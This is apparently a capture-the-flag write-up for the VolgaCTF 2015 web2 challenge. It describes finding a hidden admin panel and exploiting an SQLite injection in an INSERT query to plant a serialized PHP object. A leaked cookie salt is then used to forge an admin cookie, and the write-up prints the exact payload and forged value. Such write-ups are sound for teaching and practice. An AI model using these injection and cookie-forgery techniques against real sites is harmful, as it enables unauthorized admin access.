The task gave us a website: http://web2.2015.volgactf.ru/

There wasn’t anything interesting really so we started to do some recon and found the /robots.txt file. It pointed us to another page which is /SecretAdminPanel. There we found a forbidden message. Also, the page created a cookie PHPSESS which is {“isAdmin”:false}0afb5cf5c7d66587da7c811767250458. We started fuzzing around and suddenly an SQLite error appeared with** /?qwe='**

Apparently it was weird but then we figured out we were injecting in an INSERT query. To dump the database we used an error-based injection => https://rdot.org/forum/showthread.php?p=26419 but apart from logs table nothing really useful showed up. Then we found this page /logs

Here we found all our requests where the params’s content from the logs table gets unserialized. Since we can control this value we can userialize what we want. To get more information about this page we tryed to unserialize the Exception class:

web2.2015.volgactf.ru//SecretAdminPanel?qqq=";}'),('79.40.107.58','O:9:"Exception":0:{}');--

And this lead us to something interesting:

["file"]=>
string(57) "/var/www/web2/application/controllers/controller_logs.php"
["line"]=>
int(7)
["function"]=>
string(8) "generate"
["class"]=>
string(4) "View"
["type"]=>
string(2) "->"
["args"]=>
array(4) {
[0]=>
&string(13) "logs_view.php"
[1]=>
&string(17) "template_view.php"
[2]=>
object(Session)#3 (2) {
["cookieSalt":"Session":private]=>
string(20) "nO97M0Za6cu9wDC72VVv"
["params":"Session":private]=>
array(1) {
["isAdmin"]=>
bool(false)
}
}
[3]=>

looks like that salt is the one used to encrypt the cookie right? So we tryed to submit something like: md5('{“isAdmin”:true}nO97M0Za6cu9wDC72VVv')=%7B%22isAdmin%22%3Atrue%7D59218ddbff65da5eb025f5ee88260c9e

and get back to /SecretAdminPanel and grab our flag: {417a4c17bd3132bba864dac9edf4ae7a}

Razor4x